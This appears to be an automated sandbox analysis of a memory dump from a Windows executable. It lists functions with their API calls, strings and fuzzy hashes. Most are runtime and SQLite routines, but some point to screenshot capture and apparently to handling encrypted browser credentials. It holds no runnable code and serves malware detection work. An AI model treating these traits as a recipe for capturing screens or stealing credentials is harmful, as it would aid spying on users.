_memmove.LIBCMT ref: 004040EE
_memmove.LIBCMT ref: 00404111
std::_Xinvalid_argument.LIBCPMT ref: 0040413D
std::_Xinvalid_argument.LIBCPMT ref: 00404188
std::_Xinvalid_argument.LIBCPMT ref: 0040419E
_memmove.LIBCMT ref: 004041E1
_memmove.LIBCMT ref: 004041FE

Strings

string too long, xrefs: 00404064, 00404199
invalid string position, xrefs: 00404138, 00404183

Memory Dump Source

Source File: 00000019.00000002.452249201.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: _memmove$Xinvalid_argumentstd::_
String ID: invalid string position$string too long
API String ID: 1771113911-4289949731
Opcode ID: c26d2d35058b0d4886ab527f8dc05504dec7deb65eeb02a14e7f29b0bef27195
Instruction ID: 029a1ed6df909386a0fd4be93ffa626285e4c0521d2b432efc450b21c908ee87
Opcode Fuzzy Hash: c26d2d35058b0d4886ab527f8dc05504dec7deb65eeb02a14e7f29b0bef27195
Instruction Fuzzy Hash: 9A51E0B03002449BDB249E5DDD8492BB7A6EBD1704B14092FFA52AB6C1CB78EC81C79D

Uniqueness

Uniqueness Score: -1.00%

Function 0042A9F9, Relevance: 17.7, APIs: 4, Strings: 6, Instructions: 223COMMON

Download Yara Rule

APIs

Part of subcall function 0041E194: _memset.LIBCMT ref: 0041E1B1

__fprintf_l.LIBCMT ref: 0042AA90
__fprintf_l.LIBCMT ref: 0042AB0C
__fprintf_l.LIBCMT ref: 0042AB85
__fprintf_l.LIBCMT ref: 0042AC15

Strings

winGetTempname5, xrefs: 0042ABE5
winGetTempname1, xrefs: 0042AA71
winGetTempname4, xrefs: 0042ABFC
winGetTempname3, xrefs: 0042AAED
etilqs_, xrefs: 0042AA02, 0042AC06
winGetTempname2, xrefs: 0042AB59

Memory Dump Source

Source File: 00000019.00000002.452249201.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: __fprintf_l$_memset
String ID: etilqs_$winGetTempname1$winGetTempname2$winGetTempname3$winGetTempname4$winGetTempname5
API String ID: 639243752-3409217566
Opcode ID: 3ddff6608b8166ea6f4b1a83f9d9418697d365b64e81103a959845a5ff67348d
Instruction ID: c05b965fa417139a0660b0f0fc0e17a3cf22c761794f4fc20f088162223cf099
Opcode Fuzzy Hash: 3ddff6608b8166ea6f4b1a83f9d9418697d365b64e81103a959845a5ff67348d
Instruction Fuzzy Hash: 1B614630704611EBD714BF26ED41DBE3B9A9F41348B54442FF80286286EB3CD992C6AF

Uniqueness

Uniqueness Score: -1.00%

Function 0046092E, Relevance: 17.5, APIs: 9, Strings: 1, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00460935
std::_Lockit::_Lockit.LIBCPMT ref: 0046093F
int.LIBCPMT ref: 00460956

Part of subcall function 0040E7C0: std::_Lockit::_Lockit.LIBCPMT ref: 0040E7D1

std::locale::_Getfacet.LIBCPMT ref: 0046095F
codecvt.LIBCPMT ref: 00460979
std::bad_exception::bad_exception.LIBCMT ref: 0046098D
__CxxThrowException@8.LIBCMT ref: 0046099B
std::locale::facet::_Incref.LIBCPMT ref: 004609AB
std::locale::facet::_Facet_Register.LIBCPMT ref: 004609B1

Strings

bad cast, xrefs: 00460985

Memory Dump Source

Source File: 00000019.00000002.452249201.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: LockitLockit::_std::_std::locale::facet::_$Exception@8Facet_GetfacetH_prolog3IncrefRegisterThrowcodecvtstd::bad_exception::bad_exceptionstd::locale::_
String ID: bad cast
API String ID: 1335069804-3145022300
Opcode ID: cd79384fef1f77b9072095cc43c5610e65244484bd1c5ee125791dbdcc01bb60
Instruction ID: 55cdbc2eda2367954acc80750543d153a50a7ecde925d63bde76dc9d08433b43
Opcode Fuzzy Hash: cd79384fef1f77b9072095cc43c5610e65244484bd1c5ee125791dbdcc01bb60
Instruction Fuzzy Hash: 0D015E7190021597CF01FBA2C852ABE7326AF50728F15092FE4116B2D2EF3C9A05975E

Uniqueness

Uniqueness Score: -1.00%

Function 004109F9, Relevance: 17.5, APIs: 9, Strings: 1, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00410A00
std::_Lockit::_Lockit.LIBCPMT ref: 00410A0A
int.LIBCPMT ref: 00410A21

Part of subcall function 0040E7C0: std::_Lockit::_Lockit.LIBCPMT ref: 0040E7D1

std::locale::_Getfacet.LIBCPMT ref: 00410A2A
ctype.LIBCPMT ref: 00410A44
std::bad_exception::bad_exception.LIBCMT ref: 00410A58
__CxxThrowException@8.LIBCMT ref: 00410A66
std::locale::facet::_Incref.LIBCPMT ref: 00410A76
std::locale::facet::_Facet_Register.LIBCPMT ref: 00410A7C

Strings

bad cast, xrefs: 00410A50

Memory Dump Source

Source File: 00000019.00000002.452249201.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: LockitLockit::_std::_std::locale::facet::_$Exception@8Facet_GetfacetH_prolog3IncrefRegisterThrowctypestd::bad_exception::bad_exceptionstd::locale::_
String ID: bad cast
API String ID: 2043575007-3145022300
Opcode ID: 44a746111c136fa462104c10abe98b07bafbb958524ccdf8178c93e08636b6f1
Instruction ID: 5e07171dfcbb5b2c7f366fbbc61a156674da89e8b8465a570a758c9dc626d0df
Opcode Fuzzy Hash: 44a746111c136fa462104c10abe98b07bafbb958524ccdf8178c93e08636b6f1
Instruction Fuzzy Hash: 120161319002159BCF01FBA2D852AFD73356F50728F15492FE4116B2D1EF7C9A81975E

Uniqueness

Uniqueness Score: -1.00%

Function 00460A94, Relevance: 17.5, APIs: 9, Strings: 1, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00460A9B
std::_Lockit::_Lockit.LIBCPMT ref: 00460AA5
int.LIBCPMT ref: 00460ABC

Part of subcall function 0040E7C0: std::_Lockit::_Lockit.LIBCPMT ref: 0040E7D1

std::locale::_Getfacet.LIBCPMT ref: 00460AC5
numpunct.LIBCPMT ref: 00460ADF
std::bad_exception::bad_exception.LIBCMT ref: 00460AF3
__CxxThrowException@8.LIBCMT ref: 00460B01
std::locale::facet::_Incref.LIBCPMT ref: 00460B11
std::locale::facet::_Facet_Register.LIBCPMT ref: 00460B17

Strings

bad cast, xrefs: 00460AEB

Memory Dump Source

Source File: 00000019.00000002.452249201.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: LockitLockit::_std::_std::locale::facet::_$Exception@8Facet_GetfacetH_prolog3IncrefRegisterThrownumpunctstd::bad_exception::bad_exceptionstd::locale::_
String ID: bad cast
API String ID: 2348202366-3145022300
Opcode ID: 4f0d858934899a9dd91069a97cb49ff683f417477bd3762ad21fc64a80e8f397
Instruction ID: 577e885cad7f9192c5acc5f6b94075d75a9c2ca027216a2a9fdfc77923ff9818
Opcode Fuzzy Hash: 4f0d858934899a9dd91069a97cb49ff683f417477bd3762ad21fc64a80e8f397
Instruction Fuzzy Hash: 9101617190021997CF01FBA2D852ABE7335AF40B28F50096FE4117B2D1EF7C9A01975E

Uniqueness

Uniqueness Score: -1.00%

Function 0042262F, Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 139COMMON

Download Yara Rule

APIs

__fprintf_l.LIBCMT ref: 004226EE
__fprintf_l.LIBCMT ref: 00422733
_memmove.LIBCMT ref: 00422776
__fprintf_l.LIBCMT ref: 004227A3

Strings

, xrefs: 004226A6
CREATE TABLE , xrefs: 004226E5
, , xrefs: 004226AD

Memory Dump Source

Source File: 00000019.00000002.452249201.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: __fprintf_l$_memmove
String ID: $, $CREATE TABLE
API String ID: 3461008893-3459038510
Opcode ID: d6421dbf6bc4441316b2a147696ad7a70d4d02c7e0e72bfb320e455724b1bc93
Instruction ID: 7afaa2fc4a9fa72412e12cf93fe45c373d5c9d54822805eca9fabad4e085ff01
Opcode Fuzzy Hash: d6421dbf6bc4441316b2a147696ad7a70d4d02c7e0e72bfb320e455724b1bc93
Instruction Fuzzy Hash: 31518072D00229EFCB10DF99D981AEFBBF5EF44308F60445BE845A7205E7789A45CB98

Uniqueness

Uniqueness Score: -1.00%

Function 0041EC70, Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 77COMMON

Download Yara Rule

APIs

__fprintf_l.LIBCMT ref: 0041ED17
__fprintf_l.LIBCMT ref: 0041ED2C

Strings

FdF, xrefs: 0041ECA1
bF, xrefs: 0041ECFE
@dF, xrefs: 0041ECD9
OsError 0x%lx (%lu), xrefs: 0041ED0C

Memory Dump Source

Source File: 00000019.00000002.452249201.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: __fprintf_l
String ID: @dF$FdF$OsError 0x%lx (%lu)$bF
API String ID: 3906573944-153937404
Opcode ID: 9332f5d02ffc12a5038ac2e4e5ef1477120ae145df3202d43c9f169b28bf42c2
Instruction ID: 0390b4f7275df070a5972724ba80d02ce4912bcb43aaac47ae6431803e5d4c0a
Opcode Fuzzy Hash: 9332f5d02ffc12a5038ac2e4e5ef1477120ae145df3202d43c9f169b28bf42c2
Instruction Fuzzy Hash: C821A179900118FACF11BBA7ED49CDF7F7AEF84794B104067F905A2110DB384A80DBA8

Uniqueness

Uniqueness Score: -1.00%

Function 00470180, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,00499468,00000008,00470288,00000000,00000000,?,?,00467640,00000001,00000000,?,?,?,0046769E,00402DA3), ref: 00470191
__lock.LIBCMT ref: 004701C5

Part of subcall function 00472A09: __mtinitlocknum.LIBCMT ref: 00472A1F
Part of subcall function 00472A09: __amsg_exit.LIBCMT ref: 00472A2B
Part of subcall function 00472A09: EnterCriticalSection.KERNEL32(00000000,00000000,?,004701CA,0000000D), ref: 00472A33

InterlockedIncrement.KERNEL32(?), ref: 004701D2
__lock.LIBCMT ref: 004701E6
___addlocaleref.LIBCMT ref: 00470204

Strings

KERNEL32.DLL, xrefs: 0047018C

Memory Dump Source

Source File: 00000019.00000002.452249201.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
String ID: KERNEL32.DLL
API String ID: 637971194-2576044830
Opcode ID: bd2d73a5c37b10c049c8130ad4cf988b84cbb8acb719e10c445666a9b0dac508
Instruction ID: 8e00da309b3ace2d843035e86f14a78c79139ab64b9b24529f34df930dded43d
Opcode Fuzzy Hash: bd2d73a5c37b10c049c8130ad4cf988b84cbb8acb719e10c445666a9b0dac508
Instruction Fuzzy Hash: B601A171441B00EFD720AFA6D909749FBE0AF00319F20895FE499523A1DBB8AA44CB19

Uniqueness

Uniqueness Score: -1.00%

Function 0044890C, Relevance: 9.2, APIs: 1, Strings: 4, Instructions: 405COMMON

Download Yara Rule

APIs

__fprintf_l.LIBCMT ref: 00448AD0

Strings

-mj%06X9%02X, xrefs: 00448AC6
MJ delete: %s, xrefs: 00448AF2
%s-mjXXXXXX9XXz, xrefs: 00448A66
MJ collide: %s, xrefs: 00448A9B

Memory Dump Source

Source File: 00000019.00000002.452249201.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: __fprintf_l
String ID: %s-mjXXXXXX9XXz$-mj%06X9%02X$MJ collide: %s$MJ delete: %s
API String ID: 3906573944-4034981963
Opcode ID: 81019ecf9657fd194a133af4bca22953febb2cfe1cc7bdad44359f2ba744c3e6
Instruction ID: d62ea1f71efc347e81bb8cdf44990b6c7e3c185f246806260c88599b9431391f
Opcode Fuzzy Hash: 81019ecf9657fd194a133af4bca22953febb2cfe1cc7bdad44359f2ba744c3e6
Instruction Fuzzy Hash: D8E13B70E01619EFEB21DF99C881AAEB7B1FF04714F14445FE905A7341CB789E818B99

Uniqueness

Uniqueness Score: -1.00%

Function 0042CB52, Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 232COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 0042CC58
_memmove.LIBCMT ref: 0042CD76

Strings

unknown column "%s" in foreign key definition, xrefs: 0042CD46
number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 0042CBD7
foreign key on %s should reference only one column of table %T, xrefs: 0042CBAF

Memory Dump Source

Source File: 00000019.00000002.452249201.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: _memmove
String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
API String ID: 4104443479-272990098
Opcode ID: 15dc38a84e5e7516d60639c0f1892b181a839f08382dc31906713e833e334bb8
Instruction ID: 4ebbcf98fc211a4dc3bf637eb21ea4428b9fd7c8e5b79575881eb30b1c182e0f
Opcode Fuzzy Hash: 15dc38a84e5e7516d60639c0f1892b181a839f08382dc31906713e833e334bb8
Instruction Fuzzy Hash: 02918071A00215DFCB10DF59D980AAEBBF1FF48314B54856EE805AB312D739EA41CF94

Uniqueness

Uniqueness Score: -1.00%

Function 0040CB66, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 118COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 0040CBA6
_memmove.LIBCMT ref: 0040CC69
std::_Xinvalid_argument.LIBCPMT ref: 0040CC89

Strings

string too long, xrefs: 0040CBA1
invalid string position, xrefs: 0040CC84

Memory Dump Source

Source File: 00000019.00000002.452249201.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Xinvalid_argumentstd::_$_memmove
String ID: invalid string position$string too long
API String ID: 2168136238-4289949731
Opcode ID: 3b0826ae85ae7f24161e865d78adb7e7430a6d7846291ed2e32f3631054e1c30
Instruction ID: c20ba6021509885642bc9c17e758f4193033208c6ef95c946a024ca4b614648a
Opcode Fuzzy Hash: 3b0826ae85ae7f24161e865d78adb7e7430a6d7846291ed2e32f3631054e1c30
Instruction Fuzzy Hash: EC41B270304205DBDB14DF58D9C086A73B6EB867047204A3FE806EB2C1E638ED06CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 00412474, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 110memoryCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 0041247B
_memset.LIBCMT ref: 004124D6
LocalAlloc.KERNEL32 ref: 00412511

Part of subcall function 004046B4: _memmove.LIBCMT ref: 004046D6

Part of subcall function 00402CD0: _memmove.LIBCMT ref: 00402CEF

Strings

v10, xrefs: 004124A4
NULL, xrefs: 00412588

Memory Dump Source

Source File: 00000019.00000002.452249201.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: _memmove$AllocH_prolog3_Local_memset
String ID: NULL$v10
API String ID: 1135815740-1391045996
Opcode ID: 4f12ef1e7e9e5dec935c9b6a6143f6fd8c3739b0802609ccb78e578dd42ec465
Instruction ID: cc3130879b4121855b668327c8becf4fce46d84024f1dbedde584216a45d2d9e
Opcode Fuzzy Hash: 4f12ef1e7e9e5dec935c9b6a6143f6fd8c3739b0802609ccb78e578dd42ec465
Instruction Fuzzy Hash: 7D416F71900218ABDF14DFA5DD95BEEBBB9FF84304F10442EF401AB282D7B99950CB59

Uniqueness

Uniqueness Score: -1.00%

Function 0042C374, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 88COMMON

Download Yara Rule

APIs

Part of subcall function 0041E194: _memset.LIBCMT ref: 0041E1B1

__fprintf_l.LIBCMT ref: 0042C3BC
__aulldiv.LIBCMT ref: 0042C3F6
__fprintf_l.LIBCMT ref: 0042C405

Strings

%llu, xrefs: 0042C3FD
%llu, xrefs: 0042C3B4

Memory Dump Source

Source File: 00000019.00000002.452249201.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: __fprintf_l$__aulldiv_memset
String ID: %llu$%llu
API String ID: 2327972778-4283164361
Opcode ID: 346758ee5d5abfb5b7ff487ebdb8ead41457536dcf3fb43467ff9954f17c104c
Instruction ID: a10534b6bbca0ac527d016d8594591406dd601fb04a4144a787af7a0f2057c78
Opcode Fuzzy Hash: 346758ee5d5abfb5b7ff487ebdb8ead41457536dcf3fb43467ff9954f17c104c
Instruction Fuzzy Hash: 9F21A671B00304BBDB14AF95DCC2EAF37AADB80364F50852EF851972C1DA78AD818669

Uniqueness

Uniqueness Score: -1.00%

Function 0046088E, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 67COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 004608A5

Part of subcall function 004664DF: std::exception::exception.LIBCMT ref: 004664F4
Part of subcall function 004664DF: __CxxThrowException@8.LIBCMT ref: 00466509
Part of subcall function 004664DF: std::exception::exception.LIBCMT ref: 0046651A

std::_Xinvalid_argument.LIBCPMT ref: 004608BB
_memmove.LIBCMT ref: 004608FC

Strings

string too long, xrefs: 004608B6
invalid string position, xrefs: 004608A0

Memory Dump Source

Source File: 00000019.00000002.452249201.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw_memmove
String ID: invalid string position$string too long
API String ID: 3404309857-4289949731
Opcode ID: 8f0609573dc8792e3b787da4b70a5af370bb0670c6a8f31ef5ae934659b5e719
Instruction ID: 07e3c47380ad6b6ed52e3ac9c5d70053e8c35ad7b09bccb0c1d6982e88b20f38
Opcode Fuzzy Hash: 8f0609573dc8792e3b787da4b70a5af370bb0670c6a8f31ef5ae934659b5e719
Instruction Fuzzy Hash: 8411C4717006005BDB24FE5DDC81A2FB7AAEF81754B14092FF49297682EB78AC44C79E

Uniqueness

Uniqueness Score: -1.00%

Function 0040CA3C, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 61COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 0040CA53

Part of subcall function 004664DF: std::exception::exception.LIBCMT ref: 004664F4
Part of subcall function 004664DF: __CxxThrowException@8.LIBCMT ref: 00466509
Part of subcall function 004664DF: std::exception::exception.LIBCMT ref: 0046651A

std::_Xinvalid_argument.LIBCPMT ref: 0040CA75
_memmove.LIBCMT ref: 0040CAB9

Strings

string too long, xrefs: 0040CA70
invalid string position, xrefs: 0040CA4E

Memory Dump Source

Source File: 00000019.00000002.452249201.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw_memmove
String ID: invalid string position$string too long
API String ID: 3404309857-4289949731
Opcode ID: d19cbd53ed256edd4ac688289e7d27b510d1771306d2483830b2ee19bf9824ed
Instruction ID: 7b292972aec31b16c06abc19042f9319a01fcdf3a23de0930ca09397c59b4ff7
Opcode Fuzzy Hash: d19cbd53ed256edd4ac688289e7d27b510d1771306d2483830b2ee19bf9824ed
Instruction Fuzzy Hash: 0C11B631300608DBCB14DF68D8C1E5AB3A9BF85714721462FF816A72C1EB38E905CB98

Uniqueness

Uniqueness Score: -1.00%

Function 0041005B, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 44COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBCMT ref: 0041007A
std::exception::exception.LIBCMT ref: 0041009C

Strings

ios_base::failbit set, xrefs: 004100C4
ios_base::badbit set, xrefs: 0041008E
ios_base::eofbit set, xrefs: 004100D4

Memory Dump Source

Source File: 00000019.00000002.452249201.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Exception@8Throwstd::exception::exception
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 3728558374-1866435925
Opcode ID: 9561d2db12ff41735d027b913010fef2fd9cd2c7c1fadabdfb83a954d76bc28e
Instruction ID: 60622e9e0da85198d585e2f089a221f2e5f0a0c7649fd425f0b24498514ed944
Opcode Fuzzy Hash: 9561d2db12ff41735d027b913010fef2fd9cd2c7c1fadabdfb83a954d76bc28e
Instruction Fuzzy Hash: C30175B1400608AEC740FF69C405BEE7FF49B04358F94C41FA5459B211EBBCCA858B6A

Uniqueness

Uniqueness Score: -1.00%

Function 0046002B, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 36COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 00460033

Part of subcall function 0046949E: __FF_MSGBANNER.LIBCMT ref: 004694B7
Part of subcall function 0046949E: __NMSG_WRITE.LIBCMT ref: 004694BE
Part of subcall function 0046949E: RtlAllocateHeap.NTDLL(00000000,00000001,?,00000001,?,?,00467640,00000001,00000000,?,?,?,0046769E,00402DA3), ref: 004694E3

GetTickCount.KERNEL32 ref: 0046003E

Part of subcall function 0046B2D8: __getptd.LIBCMT ref: 0046B2DD

_rand.LIBCMT ref: 00460053

Part of subcall function 0046B2EA: __getptd.LIBCMT ref: 0046B2EA

_sprintf.LIBCMT ref: 00460066

Strings

%s%d, xrefs: 00460060

Memory Dump Source

Source File: 00000019.00000002.452249201.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: __getptd$AllocateCountHeapTick_malloc_rand_sprintf
String ID: %s%d
API String ID: 2210831635-1110647743
Opcode ID: ebd81e9942656529f1bf291e3e53d0c433d6b17cd07766941c63f639271fd63b
Instruction ID: b7c85840912f775504718487d95ad9a25f9f795e13ef6115174ac58a19cb1077
Opcode Fuzzy Hash: ebd81e9942656529f1bf291e3e53d0c433d6b17cd07766941c63f639271fd63b
Instruction Fuzzy Hash: F9E0A3233042501AD31166ED1C55B3FD79CDFD2365F20085FF10486182FAAC4C4042BB

Uniqueness

Uniqueness Score: -1.00%

Function 0046023A, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 34COMMON

Download Yara Rule

APIs

GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0046025D
GetSystemMetrics.USER32(00000000), ref: 00460263
GetSystemMetrics.USER32(00000001), ref: 0046026D

Part of subcall function 004601CC: SelectObject.GDI32(00000000,00000000), ref: 004601F5
Part of subcall function 004601CC: DeleteObject.GDI32(00000000), ref: 0046022D

GdiplusShutdown.GDIPLUS(?), ref: 00460287

Strings

screenshot.jpg, xrefs: 00460273

Memory Dump Source

Source File: 00000019.00000002.452249201.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: GdiplusMetricsObjectSystem$DeleteSelectShutdownStartup
String ID: screenshot.jpg
API String ID: 654883086-673422685
Opcode ID: 5b3162986c4697fce1e4430f1fba1209b6d5023a89b600246d1f2fec9312381a
Instruction ID: 1af3833e20a9f11a21b80a8a3a48868f5a278438c79d68a1c029940001f999b4
Opcode Fuzzy Hash: 5b3162986c4697fce1e4430f1fba1209b6d5023a89b600246d1f2fec9312381a
Instruction Fuzzy Hash: 64F0FEB2901229BACB01ABD69D459DF7BBCEF0574CF100066F501A2142E6B95B008BF6

Uniqueness

Uniqueness Score: -1.00%

Function 00472506, Relevance: 7.5, APIs: 5, Instructions: 34COMMON

Download Yara Rule

APIs

__getptd.LIBCMT ref: 00472512

Part of subcall function 004702AD: __getptd_noexit.LIBCMT ref: 004702B0
Part of subcall function 004702AD: __amsg_exit.LIBCMT ref: 004702BD

__getptd.LIBCMT ref: 00472529
__amsg_exit.LIBCMT ref: 00472537
__lock.LIBCMT ref: 00472547
__updatetlocinfoEx_nolock.LIBCMT ref: 0047255B

Memory Dump Source

Source File: 00000019.00000002.452249201.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
String ID:
API String ID: 938513278-0
Opcode ID: cfe99f6b6122d13a720520f0379b7811e57b010896ee0668d818ea5ad693cd6b
Instruction ID: 64ac73c3bdd66361e25beef97566af3f74c45f5865eb45701def4ea8de851fff
Opcode Fuzzy Hash: cfe99f6b6122d13a720520f0379b7811e57b010896ee0668d818ea5ad693cd6b
Instruction Fuzzy Hash: A0F0F672D01610AAD720B7A6AA13B8E33A06F00728F10C19FF81C672D2DBAC59008A5E

Uniqueness

Uniqueness Score: -1.00%

Function 00438AC3, Relevance: 7.5, APIs: 2, Strings: 2, Instructions: 475COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00438B8E
_memmove.LIBCMT ref: 00438E08

Strings

no query solution, xrefs: 00438EA3
, xrefs: 00438E71

Memory Dump Source

Source File: 00000019.00000002.452249201.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: _memmove_memset
String ID: $no query solution
API String ID: 3555123492-326442043
Opcode ID: 06668d158c2cca5802c0bbacb40c73fd3c8089db5bb47b7c88a3430e4b97ba36
Instruction ID: ee04a0efd604c3a55709de041c51f0f62d6c895ec5ebcfa452a9904b60c66288
Opcode Fuzzy Hash: 06668d158c2cca5802c0bbacb40c73fd3c8089db5bb47b7c88a3430e4b97ba36
Instruction Fuzzy Hash: 111297B090071A9FCB14CF99C481AAEFBB1FF58310F14915EF855AB351DB38A981CB98

Uniqueness

Uniqueness Score: -1.00%

Function 0044C675, Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 317COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 0044C702

Strings

cannot release savepoint - SQL statements in progress, xrefs: 0044C7C9
cannot open savepoint - SQL statements in progress, xrefs: 0044C697
no such savepoint: %s, xrefs: 0044C79E

Memory Dump Source

Source File: 00000019.00000002.452249201.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: _memmove
String ID: cannot open savepoint - SQL statements in progress$cannot release savepoint - SQL statements in progress$no such savepoint: %s
API String ID: 4104443479-3151731220
Opcode ID: 595ddc83f52e6138207490c5cbcb59ab9ee7995435dccf3340a005bea55488b8
Instruction ID: 696a1763685bd86d2e1e7132c5c29d9e78f5c945e75b27bb27af7aa87dcef08f
Opcode Fuzzy Hash: 595ddc83f52e6138207490c5cbcb59ab9ee7995435dccf3340a005bea55488b8
Instruction Fuzzy Hash: 20D12A71900716DFEB64CF69C881BA9B7F1BB44314F24416BD459AB342DB34AD81CF49

Uniqueness

Uniqueness Score: -1.00%

Function 0045605E, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 147COMMON

Download Yara Rule

APIs

Part of subcall function 0042407E: _memset.LIBCMT ref: 0042409D

_memmove.LIBCMT ref: 00456159

Strings

Cannot add a column to a view, xrefs: 004560AE
sqlite_altertab_%s, xrefs: 0045612B
virtual tables may not be altered, xrefs: 00456098

Memory Dump Source

Source File: 00000019.00000002.452249201.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: _memmove_memset
String ID: Cannot add a column to a view$sqlite_altertab_%s$virtual tables may not be altered
API String ID: 3555123492-2063813899
Opcode ID: cdf4cd13ccab5c872140c9c2590c24440518c0273d59a2df2b42b8ff21c34bc6
Instruction ID: 83164c4f9b6ac61f70b3ed300c70f2fb16a3a09eefacaeb4025e2fb84d5ba1ec
Opcode Fuzzy Hash: cdf4cd13ccab5c872140c9c2590c24440518c0273d59a2df2b42b8ff21c34bc6
Instruction Fuzzy Hash: 0A51A172A00615AFDB10DF69C8417A9BBF0FF08315F51406BEC04DB292EB79EA51CB88

Uniqueness

Uniqueness Score: -1.00%

Function 0042A42A, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 135COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 0042A46D
_memmove.LIBCMT ref: 0042A485

Strings

winWrite1, xrefs: 0042A581
winWrite2, xrefs: 0042A532

Memory Dump Source

Source File: 00000019.00000002.452249201.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: _memmove
String ID: winWrite1$winWrite2
API String ID: 4104443479-3457389245
Opcode ID: deb3674cd7f5e09482d484a331c5d6495a61673547013303eb4ea9d413472493
Instruction ID: 53d92ad17f1ac65ed845f9d8921504c71b3fe1cac8b846b55d436c84df73d209
Opcode Fuzzy Hash: deb3674cd7f5e09482d484a331c5d6495a61673547013303eb4ea9d413472493
Instruction Fuzzy Hash: D8419071A00219EBCF00DF94DC8569E77B1FF04314F64856AED00A7240D374DAA5CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 00428B20, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 115COMMON

Download Yara Rule

APIs

Part of subcall function 004158CE: __allrem.LIBCMT ref: 004158F7

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00428BC4
__localtime64_s.LIBCMT ref: 00428BE7

Strings

utc, xrefs: 00428B3A
local time unavailable, xrefs: 00428BF4

Memory Dump Source

Source File: 00000019.00000002.452249201.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__localtime64_s
String ID: local time unavailable$utc
API String ID: 1840914312-1312764671
Opcode ID: ce028d2acc515719706265f803e3eb70b641f70bdc3bd05841236bd025ae747c
Instruction ID: 39af83d78415040ef659582c1b496a948efffdc1f6bd52bbf99be34452425905
Opcode Fuzzy Hash: ce028d2acc515719706265f803e3eb70b641f70bdc3bd05841236bd025ae747c
Instruction Fuzzy Hash: 0A411472A00208DFCF04DF69D8819DE7BE4FF48354F50412AF929A7250DB79E9998B98

